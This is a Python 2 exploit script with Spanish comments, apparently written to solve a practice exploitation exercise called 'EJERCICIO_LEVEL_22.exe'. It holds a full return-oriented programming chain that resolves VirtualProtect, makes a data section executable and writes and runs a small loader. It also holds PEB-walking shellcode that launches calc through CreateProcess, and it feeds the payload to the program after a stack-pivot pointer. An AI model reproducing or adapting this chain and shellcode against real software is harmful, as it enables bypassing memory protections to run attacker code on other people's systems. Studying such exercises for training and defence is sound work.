import struct
import random, string
from os import *

def randomword(length):
    return ''.join(random.choice(string.letters) for i in range(length))



stdin,stdout = popen4(r"EJERCICIO_LEVEL_22.exe " + 200 * "A")
raw_input()
print stdin


#choreado de Gus
rop_gadgets = [
        #Pasamos el string "VirtualProtect" a una direccion conocida
        0X10102095,     #--- POP EDI
        0x10120000,     #--- ADDR1                               PRIMER DWORD
        0X101159DE,     #--- POP EDX RETN
        0x74726956,     #--- DATA1
        0X1010ABB8,     #--- MOV DWORD PTR DS:[EDI],EDX -POP EDI -RETN

        0x10120004,     #--- ADDR2 DEL POP EDI ANTERIOR

        0X101159DE,     #+++ POP EDX RETN
        0x506c6175,     #+++ DATA2                               SEGUNDO DOWRD
        0X1010ABB8,     #+++ MOV DWORD PTR DS:[EDI],EDX -POP EDI -RETN

        0x10120008,     #+++ ADDR3 DEL POP EDI ANTERIOR

        0X101159DE,     #--- POP EDX RETN
        0x65746f72,     #--- DATA3                               TERCER DOWRD
        0X1010ABB8,     #--- MOV DWORD PTR DS:[EDI],EDX -POP EDI -RETN

        0x1012000c,     #--- ADDR4 DEL POP EDI ANTERIOR

        0X101159DE,     #+++ POP EDX RETN
        0x00007463,     #+++ DATA4                               CUARTP DOWRD
        0X1010ABB8,     #+++ MOV DWORD PTR DS:[EDI],EDX -POP EDI -RETN

        0xFFFFFFFF,     #+++ FILLER

        #Sacamos la addr de VirtualProtect
        0X10101C0C,     #--- CALL GetModuleHandleW         GADGET
        0X10118380,     #--- p_"kernel32"  Este string esta en mem asi que 10 puntos

        0x1010CA59,     #+++ push eax, call GetProcAddress GADGET
        0x10120000,     #+++ p_"VirtualProtect" Este string es el que escribo dword a dword al arranque

        0xFFFFFFFF,
        0xFFFFFFFF,     #+++ FILLER para compensar el GetProcAddress
        0xFFFFFFFF,
        0xFFFFFFFF,

        # Hacemos VP a nuestra seccion
        0x10104384,     #--- CALL EAX, RETN                GADGET
                        # A esta altura tengo en EAX la direccion de VirtualProtect
        0x1011f000,     #--- lpaddress
        0x00002000,     #--- dwSize
        0x00000040,     #--- flNewProtect
        0x10120020,     #--- lpOldProtect

                        #Address=1011F000
                        #Size=00002000
                        #Page Information=".data"
                        #Content of section=Initialized data
                        #Allocation Type=IMG
                        #Current Protection=-RWC-
                        #Allocation Protection=ERWC-

        #escribios el loader en nuestra alternativamente podriamos usar memcpy que esta en el exe
        0X10102095,     #+++ POP EDI
        0x1011f000,     #+++ ADDR1                               PRIMER DWORD DEL "REP MOVSD"
        0X101159DE,     #+++ POP EDX RETN
        0xE689595F,     #+++ DATA1
        0X1010ABB8,     #+++ MOV DWORD PTR DS:[EDI],EDX -POP EDI -RETN

        0x1011f004,     #+++ ADDR2 DEL POP EDI ANTERIOR

        0X101159DE,     #--- POP EDX RETN
        0x9090A5F3,     #--- DATA2                               SEGUNDO DOWRD DEL "REP MOVSD"
        0X1010ABB8,     #--- MOV DWORD PTR DS:[EDI],EDX -POP EDI -RETN
        0XFFFFFFFF,     #--- FILLER

        #ejecutamos el loader
        0X1011F000,     #+++
        0x1011F007,     #+++ PARAMETROS PARA EL REP MOVS
        0x00000040      #+++
]
rop = ''.join(struct.pack('<I', _) for _ in rop_gadgets)



ShellRic =  ""
ShellRic += "\x31\xDB\x64\x8B\x7B\x30\x3E\x8B\x7F\x0C\x8B\x7F\x1C\x8B\x47\x08"
ShellRic += "\x8B\x77\x20\x8B\x3F\x80\x7E\x0C\x33\x75\xF2\x89\xC7\x03\x78\x3C"
ShellRic += "\x8B\x57\x78\x01\xC2\x8B\x7A\x20\x01\xC7\x89\xDD\x8B\x34\xAF\x01"
ShellRic += "\xC6\x45\x81\x3E\x43\x72\x65\x61\x75\xF2\x81\x7E\x08\x6F\x63\x65"
ShellRic += "\x73\x75\xE9\x8B\x7A\x24\x01\xC7\x66\x8B\x2C\x6F\x8B\x7A\x1C\x01"
ShellRic += "\xC7\x8B\x7C\xAF\xFC\x01\xC7\x31\xDB\x6A\x10\x59\x53\xE1\xFD\x68"
ShellRic += "\x63\x61\x6C\x63\x89\xE2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53"
ShellRic += "\xFF\xD7"

cadena="212"+ "\n" + "1" "\n"+ struct.pack("<L",0x101012CB)+ rop+  ShellRic+"\n"

print "Escribe: " + cadena
stdin.write(cadena)


#struct.pack("<L",0x101012CB)  pointer to xchg ecx, esp